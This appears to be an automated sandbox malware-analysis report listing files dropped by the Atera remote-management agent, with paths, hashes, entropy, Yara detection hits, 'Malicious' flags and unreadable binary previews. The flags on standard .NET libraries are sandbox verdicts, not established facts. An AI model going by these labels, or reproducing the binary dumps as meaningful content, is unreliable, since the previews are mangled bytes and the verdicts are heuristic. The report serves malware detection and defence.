                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.235108733243218
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:bzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWC:bzpjF0/t043e3vggr83jMYa/hU7HxVJU
                                                                                                                                                                                                                                        MD5:30BD9DF0841299E8FA11340B83A441B0
                                                                                                                                                                                                                                        SHA1:36447785062CB3DFDF9A1E03548EFD348760458F
                                                                                                                                                                                                                                        SHA-256:801BB92AA7A8840148FE548ECE4B7291C0E4FA73712FE2497074C925ECC906B9
                                                                                                                                                                                                                                        SHA-512:830B821EE5BF401A6B95662EE191FC8BF08BF64D4D8BFBDB0E142D303AB241C41C4134883C0851B4D5DAF49F598454CE33595787C7084B4F9504794D9B07E54B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ....................................@.................................X...O.......................0(.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.179673461309118
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:MP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ily:Mh0qjC5RMOHO420kN1Z
                                                                                                                                                                                                                                        MD5:37C069A058DC803C83C43DF6681907DA
                                                                                                                                                                                                                                        SHA1:ED522080452C472560A74F4B979BDC5CFE1643E7
                                                                                                                                                                                                                                        SHA-256:9CD89ED91343ABF19DEF9EE1809AC28765EB3D63E5597583D3D183156D8B3C62
                                                                                                                                                                                                                                        SHA-512:1F38E4153FBFF9C996C3348A325AC3E9B43118D97F5E51B1099D09C61BFC4D772ADE110603D479403317AD76AD42F494E55A58E278F825EFBFA6E1ABEE246929
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......!.....@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.674524887219165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Hh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBr882HW:Hy9eEpYinAMxCAT2HW
                                                                                                                                                                                                                                        MD5:3D126403FBA7BC6FAC6E6ABF5FCE09E8
                                                                                                                                                                                                                                        SHA1:70B60D649EB174C109C0A6DC873444473D956694
                                                                                                                                                                                                                                        SHA-256:D2B815734C2683E7759DEEA3019FCD2B19F5B879CFA3BA02620619DBCAF73E38
                                                                                                                                                                                                                                        SHA-512:BC0D56E79471051228DB678AC686BE96BEA6697C2376AE28574EDBAD52CF827AE720A7F733B6FE96B2757610771137B6E6A6CF86B787128136D17B232F09569D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................R.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.335679732582514
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCF:QnvXYcIh6yFIFBYpc47HxG
                                                                                                                                                                                                                                        MD5:14C4B9D7E63166E65ECCD9A74A55BC4A
                                                                                                                                                                                                                                        SHA1:C1F849748FBC76EC9BF9BF934135860242CE1928
                                                                                                                                                                                                                                        SHA-256:83BBFBEDA8EFB1745ECDDBEE0FB16ECAE1E6524461FE075B90C700E34C78498F
                                                                                                                                                                                                                                        SHA-512:C2774C72B62148FFFF05B2714F4720D212F52F740812D307D683D66709D77FD06F325A4DB25D952B9B2CCA5A1DD60CEDFCBFB6420FA5CE1A81B9D711395671A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.95485496879401
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRY:67N1r9KGI04CCARLY
                                                                                                                                                                                                                                        MD5:B742B57BE990E57E0D079CFAF918E086
                                                                                                                                                                                                                                        SHA1:00652CB0AD4ABCE039397AF2308B2D6D251A2B09
                                                                                                                                                                                                                                        SHA-256:8929394DD35DBF2592AAE46E1063D38D782122F2A7F6A0248A754817E4394823
                                                                                                                                                                                                                                        SHA-512:2CD15A7F0626AD3BBA10431AEEFEDE1A195987BA609EC01A51083EEEF11DA516FF4D0678451372106A27A66E013A1012FB00E74CB4F4125C7F451559DE326908
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......4T....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3585011
                                                                                                                                                                                                                                        Entropy (8bit):7.9999193745697
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:PifnPfXNZMNdg2I1fVkjUhN0ToFwQGw8tQRSm90p13l95Ogl5xs35F7gzzTaCzZw:PSPfadg2IIj+N0TK7SSKjUglopWD/Py
                                                                                                                                                                                                                                        MD5:25EE719E8A32A0C5DFC57A5923FE32F2
                                                                                                                                                                                                                                        SHA1:F48E0549F5F05476EB780E78F7840A98B4375193
                                                                                                                                                                                                                                        SHA-256:A5CEB8392D19691CFC565D6DE595D829D474B9B095557A55C1D11BA475E82836
                                                                                                                                                                                                                                        SHA-512:A7483CDD47E71AE7570AFF30D2EC9E8017DFE5BA6488A8E14B538912A0E3AB286BAF764A13553D30170D874C5F14EA524C5D878131304C74838AA8E0952A2831
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-......i.X..J.........1...AgentPackageMonitoring/AgentPackageMonitoring.exe....0.......(m......%..Q..a.x....EPwA.}.Qq..I..u4..w.J...^.........p......+.`.......'7...F........r.M.{.Cw......4O..0s.M(N.p.Z.@u..h2......]%......2..8a.9.^oG.......\Ul.......hC(.......nE.......l.c*>y..U..l.a.......z`.q&:..?....{m...H..B...=..6y.y..O........an.f.1yzT...2...jA....3r....R(..w.K...`.8:..y...%...e....%.....s4...G`!....w.'~H.E....6:mo...r..<(}r...TF...^s..`'.*.....~^l..l... ..<|.a..%C....t......#...X*j....7.L@..`=...... ....3WM.......O........F.E............xE.]....i@"....5.nM...,dt"E.Y=;vj+Z.].U.<h...*.0=}c.....S(D..jK.....o.t.1I...p....p....k.M..OPo.L8.......kr.VI.N'..mN..I..7/nl..e......h.{....\.c._.lR.%..3....Pj../...D..@.......%...1.AP..W.>.,..t.bWB.Ko_.9...$.}.#..1T..F..H..UL.....5.a....S..&..de.;=A.u...W...Y..}.A.T@.\.kN2..6h.c.... ....DB.PI......6..$1..$.C.....&...P..B.%.,.H"..D ..hx......h.^.c..&P._..@....../.q....q....}.....6... ..n

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):396336
                                                                                                                                                                                                                                        Entropy (8bit):6.250697507262227
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1fXwAmmWkxZjUCyC6ulqODyu+1QsF9K7SCHp5ZuI5MXd0XjkcdvCtUovOz6E8DnB:1fX7bwG6ulqJZaS5kzdKtUYOzMu2h
                                                                                                                                                                                                                                        MD5:B50005A1A62AFA85240D1F65165856EB
                                                                                                                                                                                                                                        SHA1:EEC370FA998AFCD06227DCB1BD5E6E2D36073693
                                                                                                                                                                                                                                        SHA-256:1867CF4FCB38F7E7FC98DDAD180C26A717360DF688A8EABD9F325FDE3C16F5BD
                                                                                                                                                                                                                                        SHA-512:63E664A8C12F27EF4C273330A8CE322CEACF12649C2BF61617ED8E394C43BF2CCAF1C2A14E2CE8807C11CE5EDD653FC7F942D0F4919923B37E1174A67393DBC4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5..........."...0.................. ........@.. .......................@............`.................................J...O.......(...............0(... ..........8............................................ ............... ..H............text...,.... ...................... ..`.rsrc...(...........................@..@.reloc....... ......................@..B................~.......H........-................................................................{'...*..{(...*..{)...*r.(*.....}'.....}(.....})...*....0..Y........u........L.,G(+....{'....{'...o,...,/(-....{(....{(...o....,.(/....{)....{)...o0...*.*.*....0..K....... bHQ. )UU.Z(+....{'...o1...X )UU.Z(-....{(...o2...X )UU.Z(/....{)...o3...X*..0...........r...p......%..{'......%q.........-.&.+.......o4....%..{(......%q.........-.&.+.......o4....%..{)......%q.........-.&.+.......o4....(5...*..{6...*:.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1459
                                                                                                                                                                                                                                        Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                        MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                        SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                        SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                        SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhW8:W9
                                                                                                                                                                                                                                        MD5:72133F8B7A6B747D14AD3D4BFF8CA002
                                                                                                                                                                                                                                        SHA1:476623D1CA063E5F7836DEC97384F79E9DD04786
                                                                                                                                                                                                                                        SHA-256:531EFE3FB7CACBC23B12FBEF7B426A3EEF4B4ACA64C20DF7637F4ABD46CF1FC1
                                                                                                                                                                                                                                        SHA-512:4292C7513F4843543FDDA960271E060648C7690AB48477FCE27C00220F5216FC813114078E64886AADCDD5FD42AD96DB447856C11FD5954D6B1596B744CD5F2C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=36.9

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190419076161021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:OPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxc:O2bYbYSWd85I5sSakFQhHL8G
                                                                                                                                                                                                                                        MD5:F64F56F2E4DFA797D5CB4B1CBA08644C
                                                                                                                                                                                                                                        SHA1:3C2DCA64758145239E2AEF45E05CCF6BF9A7FB8D
                                                                                                                                                                                                                                        SHA-256:F23BBB31DD11D74343840FF81E37F73FB891DE7E8C6596AEED2C405DBA97CFA0
                                                                                                                                                                                                                                        SHA-512:19181FCF32B176E9D24677DF8D740D5226F5A7D044DFB24725645C951F4F7682D9CA521F62E2420C814EF177BD20F0C470B54D1C710713F75ECC7F58F7C30CCA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ..............................o.....`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.996740439887868
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:t4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87HxsN:t4auS7S5Ea6WMcpu8I
                                                                                                                                                                                                                                        MD5:EF30D465678A904C773B58CC3B1AD66B
                                                                                                                                                                                                                                        SHA1:D08C5968C279790EF2D10BF2FFC1F2DE937ED4DD
                                                                                                                                                                                                                                        SHA-256:A5FAFA659C8CEC0FF892405939E3BB32269845D4509763ADD219C15E7D2A8710
                                                                                                                                                                                                                                        SHA-512:521E64502F81A789DFB6D4FBE545F76DFE32C7998222CE3002DCEBCE5550D60AF6F29C30F9A4B8B888639CAEDB8C718BA34D88BCCA782EF13E8CE3A81ED537BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ...............................7....`..................................`..O.......4............L..0(..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75312
                                                                                                                                                                                                                                        Entropy (8bit):6.240212933460331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Su2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrY1:fF+qo7mDEwj4NXLGcfgruFcg7HxRv
                                                                                                                                                                                                                                        MD5:E307CE14EC46071E8D18B6E281A4F955
                                                                                                                                                                                                                                        SHA1:2AA8E6FFF7346019682148DCBCEF44F72ECC4982
                                                                                                                                                                                                                                        SHA-256:E1E9378C07B6783755D1CB46115A1791651588BD172BD535630C306198D384A9
                                                                                                                                                                                                                                        SHA-512:2D7A23FF1D4837FA51E9C93FA0FAC0CE4F5C7744DFED28DD87C75CFF550DA121D0383F488316FF056E60C1068F59A3634E0B09D62065271B1773B73E99C54D4F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`......9.....`.....................................O.... ..................0(...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.407791203959866
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:GQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bMEpYinAMxCkU:G9MYPJS/16/E8/3A+++bF7Hx3U
                                                                                                                                                                                                                                        MD5:A36553BAC1F9CBF5ECBC13F7BB830E7B
                                                                                                                                                                                                                                        SHA1:2BDACF2F0FD7ED5F3E62E4888F0A9034E8882BFE
                                                                                                                                                                                                                                        SHA-256:CC527E9A3E527C9907D1AA00564057D070BA9B269B9FB2AD8D0F3DD380CBD3B4
                                                                                                                                                                                                                                        SHA-512:9B3CD927725CCA3B2159F91406EF472506348BDB9CF1066386E1DAD1E9C2C4F4A72BF7A936AC9694F259C9F73AFB71B1CC37F9B5C0B1FF3D0259D1B9BD3214B1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D............." ..0.............b.... ........... ....................................`.....................................O.......4...............0(..........$...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................B.......H.......|E...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
